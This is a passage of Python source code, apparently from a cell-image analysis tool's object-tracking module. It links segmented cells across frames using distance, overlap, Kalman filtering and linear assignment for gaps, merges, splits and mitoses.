pow_of_2 = 2**np.mgrid[0:8,0:len(indexer)][0]
bits = (indexer & pow_of_2).astype(bool)
indexer = np.sum(bits.transpose() * (2 ** np.arange(7,-1,-1)), 1)
recolored_labels = indexer[labels]
cm = matplotlib.cm.get_cmap(cpprefs.get_default_colormap())
cm.set_bad((0,0,0))
norm = matplotlib.colors.BoundaryNorm(range(256), 256)
img = ax.imshow(numpy.ma.array(recolored_labels, mask=(labels==0)),
cmap=cm, norm=norm)
if self.display_type == DT_COLOR_AND_NUMBER:
i,j = centers_of_labels(labels)
for n, x, y in zip(object_numbers, j, i):
if np.isnan(x) or np.isnan(y):
# This happens if there are missing labels
continue
ax.annotate(str(n), xy=(x,y),color='white',
arrowprops=dict(visible=False))
def run_distance(self, workspace, objects):
'''Track objects based on distance'''
old_i, old_j = self.get_saved_coordinates(workspace)
if len(old_i):
distances, (i,j) = distance_transform_edt(objects.segmented == 0,
return_indices=True)
#
# Look up the coordinates of the nearest new object (given by
# the transform i,j), then look up the label at that coordinate
# (objects.segmented[#,#])
#
new_object_numbers = objects.segmented[i[old_i, old_j],
j[old_i, old_j]]
#
# Mask out any objects at too great of a distance
#
new_object_numbers[distances[old_i, old_j] >
self.pixel_radius.value] = 0
#
# Do the same with the new centers and old objects
#
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
old_labels = self.get_saved_labels(workspace)
distances, (old_i,old_j) = distance_transform_edt(
old_labels == 0,
return_indices=True)
old_object_numbers = old_labels[old_i[i, j],
old_j[i, j]]
old_object_numbers[distances[i, j] > self.pixel_radius.value] = 0
self.map_objects(workspace,
new_object_numbers,
old_object_numbers,
i,j)
else:
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
count = len(i)
self.map_objects(workspace, np.zeros((0,),int),
np.zeros(count,int), i,j)
self.set_saved_labels(workspace, objects.segmented)
def run_lapdistance(self, workspace, objects):
'''Track objects based on distance'''
m = workspace.measurements
old_i, old_j = self.get_saved_coordinates(workspace)
n_old = len(old_i)
#
# Automatically set the cost of birth and death above
# that of the largest allowable cost.
#
costBorn = costDie = self.radius_limit.max * 1.10
kalman_states = self.get_kalman_states(workspace)
if kalman_states == None:
if self.static_model:
kalman_states = [ cpfilter.static_kalman_model()]
else:
kalman_states = []
if self.velocity_model:
kalman_states.append(cpfilter.velocity_kalman_model())
areas = fix(scipy.ndimage.sum(
np.ones(objects.segmented.shape), objects.segmented,
np.arange(1, np.max(objects.segmented) + 1,dtype=np.int32)))
areas = areas.astype(int)
model_types = np.array(
[m for m, s in ((KM_NO_VEL, self.static_model),
(KM_VEL, self.velocity_model)) if s], int)
if n_old > 0:
new_i, new_j = centers_of_labels(objects.segmented)
n_new = len(new_i)
i,j = np.mgrid[0:n_old, 0:n_new]
##############################
#
# Kalman filter prediction
#
#
# We take the lowest cost among all possible models
#
minDist = np.ones((n_old, n_new)) * self.radius_limit.max
d = np.ones((n_old, n_new)) * np.inf
sd = np.zeros((n_old, n_new))
# The index of the Kalman filter used: -1 means not used
kalman_used = -np.ones((n_old, n_new), int)
for nkalman, kalman_state in enumerate(kalman_states):
assert isinstance(kalman_state, cpfilter.KalmanState)
obs = kalman_state.predicted_obs_vec
dk = np.sqrt((obs[i,0] - new_i[j])**2 +
(obs[i,1] - new_j[j])**2)
noise_sd = np.sqrt(np.sum(kalman_state.noise_var[:,0:2], 1))
radius = np.maximum(np.minimum(noise_sd * self.radius_std.value,
self.radius_limit.max),
self.radius_limit.min)
is_best = ((dk < d) & (dk < radius[:, np.newaxis]))
d[is_best] = dk[is_best]
minDist[is_best] = radius[i][is_best]
kalman_used[is_best] = nkalman
minDist = np.maximum(np.minimum(minDist, self.radius_limit.max),
self.radius_limit.min)
#
#############################
#
# Linear assignment setup
#
n = len(old_i)+len(new_i)
kk = np.zeros((n+10)*(n+10), np.int32)
first = np.zeros(n+10, np.int32)
cc = np.zeros((n+10)*(n+10), np.float)
t = np.argwhere((d < minDist))
x = np.sqrt((old_i[t[0:t.size, 0]]-new_i[t[0:t.size, 1]])**2 + (old_j[t[0:t.size, 0]]-new_j[t[0:t.size, 1]])**2)
t = t+1
t = np.column_stack((t, x))
a = np.arange(len(old_i))+2
x = np.searchsorted(t[0:(t.size/2),0], a)
a = np.arange(len(old_i))+1
b = np.arange(len(old_i))+len(new_i)+1
c = np.zeros(len(old_i))+costDie
b = np.column_stack((a, b, c))
t = np.insert(t, x, b, 0)
i,j = np.mgrid[0:len(new_i),0:len(old_i)+1]
i = i+len(old_i)+1
j = j+len(new_i)
j[0:len(new_i)+1,0] = i[0:len(new_i)+1,0]-len(old_i)
x = np.zeros((len(new_i),len(old_i)+1))
x[0:len(new_i)+1,0] = costBorn
i = i.flatten()
j = j.flatten()
x = x.flatten()
x = np.column_stack((i, j, x))
t = np.vstack((t, x))
# Tack 0 <-> 0 at the start because object #s start at 1
i = np.hstack([0,t[:,0].astype(int)])
j = np.hstack([0,t[:,1].astype(int)])
c = np.hstack([0,t[:,2]])
x, y = lapjv(i, j, c)
a = np.argwhere(x > len(new_i))
b = np.argwhere(y >len(old_i))
x[a[0:len(a)]] = 0
y[b[0:len(b)]] = 0
a = np.arange(len(old_i))+1
b = np.arange(len(new_i))+1
new_object_numbers = x[a[0:len(a)]].astype(int)
old_object_numbers = y[b[0:len(b)]].astype(int)
###############################
#
# Kalman filter update
#
model_idx = np.zeros(len(old_object_numbers), int)
linking_distance = np.ones(len(old_object_numbers)) * np.NaN
standard_deviation = np.ones(len(old_object_numbers)) * np.NaN
model_type = np.ones(len(old_object_numbers), int) * KM_NONE
link_type = np.ones(len(old_object_numbers), int) * LT_NONE
mask = old_object_numbers > 0
old_idx = old_object_numbers - 1
model_idx[mask] =\
kalman_used[old_idx[mask], mask]
linking_distance[mask] = d[old_idx[mask], mask]
standard_deviation[mask] = \
linking_distance[mask] / noise_sd[old_idx[mask]]
model_type[mask] = model_types[model_idx[mask]]
link_type[mask] = LT_PHASE_1
#
# The measurement covariance is the square of the
# standard deviation of the measurement error. Assume
# that the measurement error comes from not knowing where
# the center is within the cell, then the error is
# proportional to the radius and the square to the area.
#
measurement_variance = areas.astype(float) / np.pi
#
# Broadcast the measurement error into a diagonal matrix
#
r = (measurement_variance[:, np.newaxis, np.newaxis] *
np.eye(2)[np.newaxis,:,:])
new_kalman_states = []
for kalman_state in kalman_states:
#
# The process noise covariance is a diagonal of the
# state noise variance.
#
state_len = kalman_state.state_len
q = np.zeros((len(old_idx), state_len, state_len))
if np.any(mask):
#
# Broadcast into the diagonal
#
new_idx = np.arange(len(old_idx))[mask]
matching_idx = old_idx[new_idx]
i,j = np.mgrid[0:len(matching_idx),0:state_len]
q[new_idx[i], j, j] = \
kalman_state.noise_var[matching_idx[i],j]
new_kalman_state = cpfilter.kalman_filter(
kalman_state,
old_idx,
np.column_stack((new_i, new_j)),
q,r)
new_kalman_states.append(new_kalman_state)
self.set_kalman_states(workspace, new_kalman_states)
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
self.map_objects(workspace,
new_object_numbers,
old_object_numbers,
i,j)
else:
i,j = centers_of_labels(objects.segmented)
count = len(i)
link_type = np.ones(count, int) * LT_NONE
model_type = np.ones(count, int) * KM_NONE
linking_distance = np.ones(count) * np.NaN
standard_deviation = np.ones(count) * np.NaN
#
# Initialize the kalman_state with the new objects
#
new_kalman_states = []
r = np.zeros((count, 2, 2))
for kalman_state in kalman_states:
q = np.zeros((count, kalman_state.state_len, kalman_state.state_len))
new_kalman_state = cpfilter.kalman_filter(
kalman_state, -np.ones(count),
np.column_stack((i,j)), q, r)
new_kalman_states.append(new_kalman_state)
self.set_kalman_states(workspace, new_kalman_states)
i = (i+.5).astype(int)
j = (j+.5).astype(int)
self.map_objects(workspace, np.zeros((0,),int),
np.zeros(count,int), i,j)
m = workspace.measurements
assert isinstance(m, cpmeas.Measurements)
m.add_measurement(self.object_name.value,
self.measurement_name(F_AREA),
areas)
m[self.object_name.value,
self.measurement_name(F_LINKING_DISTANCE)] = linking_distance
m[self.object_name.value,
self.measurement_name(F_STANDARD_DEVIATION)] = standard_deviation
m[self.object_name.value,
self.measurement_name(F_MOVEMENT_MODEL)] = model_type
m[self.object_name.value,
self.measurement_name(F_LINK_TYPE)] = link_type
self.save_kalman_measurements(workspace)
self.set_saved_labels(workspace, objects.segmented)
def get_kalman_models(self):
'''Return tuples of model and names of the vector elements'''
if self.static_model:
models = [ (F_STATIC_MODEL, (F_Y, F_X))]
else:
models = []
if self.velocity_model:
models.append((F_VELOCITY_MODEL, (F_Y, F_X, F_VY, F_VX)))
return models
def save_kalman_measurements(self, workspace):
'''Save the first-pass state_vec, state_cov and state_noise'''
m = workspace.measurements
object_name = self.object_name.value
for (model, elements), kalman_state in zip(
self.get_kalman_models(), self.get_kalman_states(workspace)):
assert isinstance(kalman_state, cpfilter.KalmanState)
nobjs = len(kalman_state.state_vec)
if nobjs > 0:
#
# Get the last state_noise entry for each object
#
# scipy.ndimage.maximum probably should return NaN if
# no index exists, but, in 0.8.0, returns 0. So stack
# a bunch of -1 values so every object will have a "-1"
# index.
last_idx = scipy.ndimage.maximum(
np.hstack((
-np.ones(nobjs),
np.arange(len(kalman_state.state_noise_idx)))),
np.hstack((
np.arange(nobjs), kalman_state.state_noise_idx)),
np.arange(nobjs))
last_idx = last_idx.astype(int)
for i, element in enumerate(elements):
#
# state_vec
#
mname = self.measurement_name(
kalman_feature(model, F_STATE, element))
values = np.zeros(0) if nobjs == 0 else kalman_state.state_vec[:,i]
m.add_measurement(object_name, mname, values)
#
# state_noise
#
mname = self.measurement_name(
kalman_feature(model, F_NOISE, element))
values = np.zeros(nobjs)
if nobjs > 0:
values[last_idx == -1] = np.NaN
values[last_idx > -1] = kalman_state.state_noise[last_idx[last_idx > -1], i]
m.add_measurement(object_name, mname, values)
#
# state_cov
#
for j, el2 in enumerate(elements):
mname = self.measurement_name(
kalman_feature(model, F_COV, element, el2))
values = kalman_state.state_cov[:, i, j]
m.add_measurement(object_name, mname, values)
def run_overlap(self, workspace, objects):
'''Track objects by maximum # of overlapping pixels'''
current_labels = objects.segmented
old_labels = self.get_saved_labels(workspace)
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
if old_labels is None:
count = len(i)
self.map_objects(workspace, np.zeros((0,),int),
np.zeros(count,int), i,j)
else:
mask = ((current_labels > 0) & (old_labels > 0))
cur_count = np.max(current_labels)
old_count = np.max(old_labels)
count = np.sum(mask)
if count == 0:
# There's no overlap.
self.map_objects(workspace,
np.zeros(old_count, int),
np.zeros(cur_count,int),
i,j)
else:
cur = current_labels[mask]
old = old_labels[mask]
histogram = scipy.sparse.coo_matrix(
(np.ones(count),(cur, old)),
shape=(cur_count+1,old_count+1)).toarray()
old_of_new = np.argmax(histogram, 1)[1:]
new_of_old = np.argmax(histogram, 0)[1:]
#
# The cast here seems to be needed to make scipy.ndimage.sum
# work. See http://projects.scipy.org/numpy/ticket/1012
#
old_of_new = np.array(old_of_new, np.int16)
old_of_new = np.array(old_of_new, np.int32)
new_of_old = np.array(new_of_old, np.int16)
new_of_old = np.array(new_of_old, np.int32)
self.map_objects(workspace,
new_of_old,
old_of_new,
i,j)
self.set_saved_labels(workspace, current_labels)
def run_measurements(self, workspace, objects):
current_labels = objects.segmented
new_measurements = workspace.measurements.get_current_measurement(
self.object_name.value,
self.measurement.value)
old_measurements = self.get_saved_measurements(workspace)
old_labels = self.get_saved_labels(workspace)
i,j = (centers_of_labels(objects.segmented)+.5).astype(int)
if old_labels is None:
count = len(i)
self.map_objects(workspace, np.zeros((0,),int),
np.zeros(count,int), i,j)
else:
associations = associate_by_distance(old_labels, current_labels,
self.pixel_radius.value)
best_child = np.zeros(len(old_measurements), int)
best_parent = np.zeros(len(new_measurements), int)
best_child_measurement = (np.ones(len(old_measurements), int) *
np.finfo(float).max)
best_parent_measurement = (np.ones(len(new_measurements), int) *
np.finfo(float).max)
for old, new in associations:
diff = abs(old_measurements[old-1] - new_measurements[new-1])
if diff < best_child_measurement[old-1]:
best_child[old-1] = new
best_child_measurement[old-1] = diff
if diff < best_parent_measurement[new-1]:
best_parent[new-1] = old
best_parent_measurement[new-1] = diff
self.map_objects(workspace, best_child, best_parent, i,j)
self.set_saved_labels(workspace,current_labels)
self.set_saved_measurements(workspace, new_measurements)
def run_as_data_tool(self, workspace):
m = workspace.measurements
assert isinstance(m, cpmeas.Measurements)
group_numbers = {}
for i in m.get_image_numbers():
group_number = m.get_measurement(cpmeas.IMAGE,
cpmeas.GROUP_NUMBER, i)
group_index = m.get_measurement(cpmeas.IMAGE,
cpmeas.GROUP_INDEX, i)
if ((not group_numbers.has_key(group_number)) or
(group_numbers[group_number][1] > group_index)):
group_numbers[group_number] = (i, group_index)
for group_number in sorted(group_numbers.keys()):
m.image_set_number = group_numbers[group_number][0]
self.post_group(workspace, {})
def flood(self, i, at, a, b, c, d, z):
z[i] = at
if(a[i] != -1 and z[a[i]] == 0):
z = self.flood(a[i], at, a, b, c, d, z)
if(b[i] != -1 and z[b[i]] == 0):
z = self.flood(b[i], at, a, b, c, d, z)
if(c[i] != -1 and z[c[i]] == 0):
z = self.flood(c[i], at, a, b, c, d, z)
if(c[i] != -1 and z[c[i]] == 0):
z = self.flood(c[i], at, a, b, c, d, z)
return z
def is_aggregation_module(self):
'''We connect objects across imagesets within a group = aggregation'''
return True
def post_group(self, workspace, grouping):
# If any tracking method other than LAP, recalculate measurements
# (Really, only the final age needs to be re-done)
if self.tracking_method != TM_LAP:
m = workspace.measurements
assert(isinstance(m, cpmeas.Measurements))
image_numbers = self.get_group_image_numbers(workspace)
self.recalculate_group(workspace, image_numbers)
return
if (self.tracking_method != TM_LAP or
not self.wants_second_phase):
return
gap_cost = float(self.gap_cost.value)
split_alternative_cost = float(self.split_cost.value) / 2
merge_alternative_cost = float(self.merge_cost.value)
mitosis_alternative_cost = float(self.mitosis_cost.value)
max_gap_score = self.max_gap_score.value
max_merge_score = self.max_merge_score.value
max_split_score = self.max_split_score.value / 2 # to match legacy
max_frame_difference = self.max_frame_distance.value
m = workspace.measurements
assert(isinstance(m, cpmeas.Measurements))
image_numbers = self.get_group_image_numbers(workspace)
object_name = self.object_name.value
label, object_numbers, a, b, Area, \
parent_object_numbers, parent_image_numbers = [
[m.get_measurement(object_name, feature, i).astype(mtype)
for i in image_numbers]
for feature, mtype in (
(self.measurement_name(F_LABEL), int),
(cpmeas.OBJECT_NUMBER, int),
(M_LOCATION_CENTER_X, float),
(M_LOCATION_CENTER_Y, float),
(self.measurement_name(F_AREA), float),
(self.measurement_name(F_PARENT_OBJECT_NUMBER), int),
(self.measurement_name(F_PARENT_IMAGE_NUMBER), int)
)]
group_indices, new_object_count, lost_object_count, merge_count, \
split_count = [
np.array([m.get_measurement(cpmeas.IMAGE, feature, i)
for i in image_numbers], int)
for feature in (cpmeas.GROUP_INDEX,
self.image_measurement_name(F_NEW_OBJECT_COUNT),
self.image_measurement_name(F_LOST_OBJECT_COUNT),
self.image_measurement_name(F_MERGE_COUNT),
self.image_measurement_name(F_SPLIT_COUNT))]
#
# Map image number to group index and vice versa
#
image_number_group_index = np.zeros(np.max(image_numbers) + 1, int)
image_number_group_index[image_numbers] = np.array(group_indices, int)
group_index_image_number = np.zeros(np.max(group_indices) + 1, int)
group_index_image_number[group_indices] = image_numbers
if all([len(lll) == 0 for lll in label]):
return # Nothing to do
#sets up the arrays F, L, P, and Q
#F is an array of all the cells that are the starts of segments
# F[:, :2] are the coordinates
# F[:, 2] is the image index
# F[:, 3] is the object index
# F[:, 4] is the object number
# F[:, 5] is the label
# F[:, 6] is the area
# F[:, 7] is the index into P
#L is the ends
#P includes all cells
X = 0
Y = 1
IIDX = 2
OIIDX = 3
ONIDX = 4
LIDX = 5
AIDX = 6
PIDX = 7
P = np.vstack([
np.column_stack((x, y, np.ones(len(x)) * i, np.arange(len(x)),
o, l, area, np.zeros(len(x))))
for i, (x, y, o, l, area)
in enumerate(zip(a, b, object_numbers, label, Area))])
count_per_label = np.bincount(P[:, LIDX].astype(int))
idx = np.hstack([0, np.cumsum(count_per_label)])
unique_label = np.unique(P[:, LIDX].astype(int))
order = np.lexsort((P[:, OIIDX], P[:, IIDX], P[:, LIDX]))
P = P[order, :]
P[:, PIDX] = np.arange(len(P))
F = P[idx[unique_label], :]
L = P[idx[unique_label + 1] - 1, :]
# Creates P1 and P2, which is P without the starts and ends
# of segments respectively, representing possible
# points of merges and splits respectively
P1 = np.delete(P, idx[:-1], 0)
P2 = np.delete(P, idx[1:] - 1, 0)
##################################################
#
# Addresses of supplementary nodes:
#
# The LAP array is composed of the following ranges
#
# Count | node type
# ------------------
# T | segment starts and ends
# T | gaps
# OB | split starts
# OB | merge ends
# M | mitoses
#
# T = # tracks
# OB = # of objects that can serve as merge or split points
# M = # of mitoses
#
# The graph:
#
# Gap Alternatives (in other words, do nothing)
# ----------------------------------------------
# End[i] <----> Gap alternative[i]
# Gap alternative[i] <----> Start[i]
# Split[i] <----> Split[i]
# Merge[j] <----> Merge[j]
# Mitosis[i] <----> Mitosis[i]
#
#
# Bridge gaps:
# -----------------------------------------------
#
# End[i] <---> Start[j]
# Gap alternative[i] <----> Gap alternative[j]
#
# Splits
# -----------------------------------------------
#
# Split[i] <----> Start[j]
# Gap alternative[j] <----> Split[i]
#
# Merges
# -----------------------------------------------
# End[i] <----> Merge[j]
# Merge[j] <----> Gap alternative[i]
#
# Mitoses
# -----------------------------------------------
# The mitosis model is somewhat imperfect. The mitosis
# caps the parent and makes it unavailable as a candidate
# for a gap closing. In the best case, there is only one
# mitosis candidate for the left and right child and
# the left and right child are connected to gap alternatives,
# but there may be competing splits, gap closings or
# other mitoses.
#
# We take a greedy approach, ordering the mitoses by their
# scores and fulfilling them. After processing the mitoses,
# we run LAP again, keeping only the parent nodes of untaken
# mitoses and child nodes connected to gap alternatives
#
# End[i] <----> Mitosis[j]
#
##################################################
end_nodes = []
start_nodes = []
scores = []
#
# The offsets and lengths of the start/end node ranges
#
start_end_off = 0
start_end_len = len(L)
gap_off = start_end_end = start_end_len
gap_end = gap_off + start_end_len
#-------------------------------------------
#
# Null model (do nothing)
#
#-------------------------------------------
for first, second in ((end_nodes, start_nodes),
(start_nodes, end_nodes)):
first.append(np.arange(start_end_len))
second.append(np.arange(start_end_len) + gap_off)
scores.append(np.ones(start_end_len) * gap_cost/2)
#------------------------------------------
#
# Gap-closing model
#
#------------------------------------------
#
# Create the edges between ends and starts.
# The edge weight is the gap pair cost.
#
a, gap_scores = self.get_gap_pair_scores(F, L, max_frame_difference)
# filter by max gap score
mask = gap_scores <= max_gap_score
if np.sum(mask) > 0:
a, gap_scores = a[mask], gap_scores[mask]
end_nodes.append(a[:, 0])
start_nodes.append(a[:, 1])
scores.append(gap_scores)
#
# Hook the gap alternative ends of the starts to
# the gap alternative starts of the ends
#
end_nodes.append(a[:, 1] + gap_off)
start_nodes.append(a[:, 0] + gap_off)
scores.append(np.zeros(len(gap_scores)))
#---------------------------------------------------
#
# Merge model
#
#---------------------------------------------------
#
# The first column of z is the index of the track that ends. The second
# is the index into P2 of the object to be merged into
#
merge_off = gap_end
if len(P1) > 0:
# Do the initial winnowing in chunks of 10m pairs
lchunk_size = 10000000 / len(P1)
chunks = []
for lstart in range(0, len(L), lchunk_size):
lend = min(len(L), lstart+lchunk_size)
merge_p1idx, merge_lidx = \
[_.flatten() for _ in np.mgrid[0:len(P1), lstart:lend]]
z = (P1[merge_p1idx, IIDX] - L[merge_lidx, IIDX]).astype(np.int32)
mask = (z <= max_frame_difference) & (z > 0)
if np.sum(mask) > 0:
chunks.append([_[mask] for _ in merge_p1idx, merge_lidx, z])
if len(chunks) > 0:
merge_p1idx, merge_lidx, z = [
np.hstack([_[i] for _ in chunks]) for i in range(3)]
else:
merge_p1idx = merge_lidx = z = np.zeros(0, np.int32)
else:
merge_p1idx = merge_lidx = z = np.zeros(0, np.int32)
if len(z) > 0:
# Calculate penalty = distance * area penalty
AreaLast = L[merge_lidx, AIDX]
AreaBeforeMerge = P[P1[merge_p1idx, PIDX].astype(int) - 1, AIDX]
AreaAtMerge = P1[merge_p1idx, AIDX]
rho = self.calculate_area_penalty(
AreaLast + AreaBeforeMerge, AreaAtMerge)
d = np.sqrt(np.sum((L[merge_lidx, :2]-P2[merge_p1idx, :2])**2, 1))
merge_scores = d * rho
mask = merge_scores <= max_merge_score
merge_p1idx, merge_lidx, merge_scores = [
_[mask] for _ in merge_p1idx, merge_lidx, merge_scores]
merge_len = np.sum(mask)
if merge_len > 0:
#
# The end nodes are the ends being merged to the intermediates
# The start nodes are the intermediates and have node #s
# that start at merge_off
#
end_nodes.append(merge_lidx)
start_nodes.append(merge_off + np.arange(merge_len))
scores.append(merge_scores)
#
# Hook the gap alternative starts for the ends to
# the merge nodes
#
end_nodes.append(merge_off + np.arange(merge_len))
start_nodes.append(merge_lidx + gap_off)
scores.append(np.ones(merge_len) * gap_cost / 2)
#
# The alternative hypothesis is represented by merges hooked
# to merges
#
end_nodes.append(merge_off + np.arange(merge_len))
start_nodes.append(merge_off + np.arange(merge_len))
scores.append(np.ones(merge_len) * merge_alternative_cost)
else:
merge_len = 0
merge_end = merge_off+merge_len
#------------------------------------------------------
#
# Split model
#
#------------------------------------------------------
split_off = merge_end
if len(P2) > 0:
lchunk_size = 10000000 / len(P2)
chunks = []
for fstart in range(0, len(L), lchunk_size):
fend = min(len(L), fstart+lchunk_size)
split_p2idx, split_fidx = \
[_.flatten() for _ in np.mgrid[0:len(P2), fstart:fend]]
z = (F[split_fidx, IIDX] - P2[split_p2idx, IIDX]).astype(np.int32)
mask = (z <= max_frame_difference) & (z > 0)
if np.sum(mask) > 0:
chunks.append(
[_[mask] for _ in split_p2idx, split_fidx, z])
if len(chunks) > 0:
split_p2idx, split_fidx, z = [
np.hstack([_[i] for _ in chunks]) for i in range(3)]
else:
split_p2idx = split_fidx = z = np.zeros(0, np.int32)
else:
split_p2idx = split_fidx = z = np.zeros(0, int)
if len(z) > 0:
AreaFirst = F[split_fidx, AIDX]
AreaAfterSplit = P[ P2[split_p2idx, PIDX].astype(int) + 1, AIDX]
AreaAtSplit = P2[split_p2idx, AIDX]
d = np.sqrt(np.sum((F[split_fidx, :2] - P2[split_p2idx, :2])**2, 1))
rho = self.calculate_area_penalty(
AreaFirst + AreaAfterSplit, AreaAtSplit)
split_scores = d * rho
mask = (split_scores <= max_split_score)
split_p2idx, split_fidx, split_scores = \
[_[mask] for _ in split_p2idx, split_fidx, split_scores]
split_len = np.sum(mask)
if split_len > 0:
#
# The end nodes are the intermediates (starting at split_off)
# The start nodes are the F
#
end_nodes.append(np.arange(split_len) + split_off)
start_nodes.append(split_fidx)
scores.append(split_scores)
#
# Hook the alternate ends to the split starts
#
end_nodes.append(split_fidx + gap_off)
start_nodes.append(np.arange(split_len) + split_off)
scores.append(np.ones(split_len) * gap_cost/2)
#
# The alternate hypothesis is split nodes hooked to themselves
#
end_nodes.append(np.arange(split_len) + split_off)
start_nodes.append(np.arange(split_len) + split_off)
scores.append(np.ones(split_len) * split_alternative_cost)
else:
split_len = 0
split_end = split_off + split_len
#----------------------------------------------------------
#
# Mitosis model
#
#----------------------------------------------------------
mitoses, mitosis_scores = self.get_mitotic_triple_scores(F, L)
n_mitoses = len(mitosis_scores)
if n_mitoses > 0:
order = np.argsort(mitosis_scores)
mitoses, mitosis_scores = mitoses[order], mitosis_scores[order]
MDLIDX = 0 # index of left daughter
MDRIDX = 1 # index of right daughter
MPIDX = 2 # index of parent
mitoses_parent_lidx = mitoses[:, MPIDX]
mitoses_left_child_findx = mitoses[:, MDLIDX]
mitoses_right_child_findx = mitoses[:, MDRIDX]
#
# Create the ranges for mitoses
#
mitosis_off = split_end
mitosis_len = n_mitoses
mitosis_end = mitosis_off + mitosis_len
if n_mitoses > 0:
#
# Taking the mitosis score will cost us the parent gap at least.
#
end_nodes.append(mitoses_parent_lidx)
start_nodes.append(np.arange(n_mitoses) + mitosis_off)
scores.append(mitosis_scores)
#
# Balance the mitosis against the gap alternative.
#
end_nodes.append(np.arange(n_mitoses) + mitosis_off)
start_nodes.append(mitoses_parent_lidx + gap_off)
scores.append(np.ones(n_mitoses) * gap_cost / 2)
#
# The alternative hypothesis links mitosis to mitosis
# We charge the alternative hypothesis the mitosis_alternative
# cost.
#
end_nodes.append(np.arange(n_mitoses) + mitosis_off)
start_nodes.append(np.arange(n_mitoses) + mitosis_off)
scores.append(np.ones(n_mitoses) * mitosis_alternative_cost)
i = np.hstack(end_nodes)
j = np.hstack(start_nodes)
c = scores = np.hstack(scores)
#-------------------------------------------------------
#
# LAP Processing # 1
#
x, y = lapjv(i, j, c)
score_matrix = scipy.sparse.coo.coo_matrix((c, (i, j))).tocsr()
#---------------------------
#
# Useful debugging diagnostics
#
def desc(node):
'''Describe a node for graphviz'''
fl = F
if node < start_end_end:
fmt = "N%d:%d"
idx = node
elif node < gap_end:
fmt = "G%d:%d"
idx = node - gap_off
elif node < merge_end:
fmt = "M%d:%d"
idx = merge_p1idx[node - merge_off]
fl = P1
elif node < split_end:
fmt = "S%d:%d"
idx = split_p2idx[node - split_off]
fl = P2
else:
mitosis = mitoses[node - mitosis_off]
(lin, lon), (rin, ron), (pin, pon) = [
(image_numbers[fl[idx, IIDX]], fl[idx, ONIDX])
for idx, fl in zip(mitosis, (F, F, L))]
return "n%d[label=\"MIT%d:%d->%d:%d+%d:%d\"]" % (
node, pin, pon, lin, lon, rin, ron)
return "n%d[label=\"%s\"]" % (
node, fmt % (image_numbers[int(fl[idx, IIDX])],
int(fl[idx, ONIDX])))
def write_graph(path, x, y):
'''Write a graphviz DOT file'''
with open(path, "w") as fd:
fd.write("digraph trackobjects {\n")
graph_idx = np.where(
(x != np.arange(len(x))) & (y != np.arange(len(y))))[0]
for idx in graph_idx:
fd.write(desc(idx)+";\n")
for idx in graph_idx:
fd.write("n%d -> n%d [label=%0.2f];\n" %
(idx, x[idx], score_matrix[idx, x[idx]]))
fd.write("}\n")
#
#--------------------------------------------------------
#
# Mitosis fixup.
#
good_mitoses = np.zeros(len(mitoses), bool)
for midx, (lidx, ridx, pidx) in enumerate(mitoses):
#
# If the parent was not accepted or either of the children
# have been assigned to a mitosis, skip
#
if x[pidx] == midx + mitosis_off and not \
any([y[idx] >= mitosis_off and y[idx] < mitosis_end
for idx in lidx, ridx]):
alt_score = sum([score_matrix[y[idx], idx] for idx in lidx, ridx])
#
# Taking the alt score would cost us a mitosis alternative
# cost, but would remove half of a gap alternative.
#
alt_score += mitosis_alternative_cost - gap_cost / 2
#
# Alternatively, taking the mitosis score would cost us
# the gap alternatives of the left and right.
#
if alt_score > mitosis_scores[midx] + gap_cost:
for idx in lidx, ridx:
old_y = y[idx]
if old_y < start_end_end:
x[old_y] = old_y + gap_off
else:
x[old_y] = old_y
y[lidx] = midx + mitosis_off
y[ridx] = midx + mitosis_off
good_mitoses[midx] = True
continue
x[pidx] = pidx + gap_off
y[pidx+gap_off] = pidx
x[midx+mitosis_off] = midx+mitosis_off
y[midx+mitosis_off] = midx+mitosis_off
if np.sum(good_mitoses) == 0:
good_mitoses = np.zeros((0, 3), int)
good_mitosis_scores = np.zeros(0)
else:
good_mitoses, good_mitosis_scores = \
mitoses[good_mitoses], mitosis_scores[good_mitoses]
#
#-------------------------------------
#
# Rerun to see if reverted mitoses could close gaps.
#
if np.any(x[mitoses[:, MPIDX]] != np.arange(len(mitoses)) + mitosis_off):
rerun_end = np.ones(mitosis_end, bool)
rerun_start = np.ones(mitosis_end, bool)
rerun_end[:start_end_end] = x[:start_end_end] < mitosis_off
rerun_end[mitosis_off:] = False
rerun_start[:start_end_end] = y[:start_end_end] < mitosis_off
rerun_start[mitosis_off:] = False
mask = rerun_end[i] & rerun_start[j]
i, j, c = i[mask], j[mask], c[mask]
i = np.hstack((i,
good_mitoses[:, MPIDX],
good_mitoses[:, MDLIDX] + gap_off,
good_mitoses[:, MDRIDX] + gap_off))
j = np.hstack((j,
good_mitoses[:, MPIDX] + gap_off,
good_mitoses[:, MDLIDX],
good_mitoses[:, MDRIDX]))
c = np.hstack((c, np.zeros(len(good_mitoses) *3)))
x, y = lapjv(i, j, c)
#
# Fixups to measurements
#
# fixup[N] gets the fixup dictionary for image set, N
#
# fixup[N][FEATURE] gets a tuple of a list of object numbers and
# values.
#
fixups = {}
def add_fixup(feature, image_number, object_number, value):
if image_number not in fixups:
fixups[image_number] = { feature: ([object_number], [value])}
else:
fid = fixups[image_number]
if feature not in fid:
fid[feature] = ([object_number], [value])
else:
object_numbers, values = fid[feature]
object_numbers.append(object_number)
values.append(value)
#attaches different segments together if they are matches through the IAP
a = -np.ones(len(F)+1, dtype="int32")
b = -np.ones(len(F)+1, dtype="int32")
c = -np.ones(len(F)+1, dtype="int32")
d = -np.ones(len(F)+1, dtype="int32")
z = np.zeros(len(F)+1, dtype="int32")
# relationships is a list of parent-child relationships. Each element
# is a two-tuple of parent and child and each parent/child is a
# two-tuple of image index and object number:
#
# [((<parent-image-index>, <parent-object-number>),
# (<child-image-index>, <child-object-number>))...]
#
relationships = []
#
# Starts can be linked to the following:
# ends (start_end_off <= j < start_end_off+start_end_len)
# gap alternatives (gap_off <= j < merge_off+merge_len)
# splits (split_off <= j < split_off+split_len)
# mitosis left (mitosis_left_child_off <= j < ....)
# mitosis right (mitosis_right_child_off <= j < ....)
#
# Discard starts linked to self = "do nothing"
#
start_idxs = np.where(
y[:start_end_end] != np.arange(gap_off, gap_end))[0]
for i in start_idxs:
my_image_index = int(F[i, IIDX])
my_image_number = image_numbers[my_image_index]
my_object_index = int(F[i, OIIDX])
my_object_number = int(F[i, ONIDX])
yi = y[i]
if yi < gap_end:
#-------------------------------
#
# GAP
#
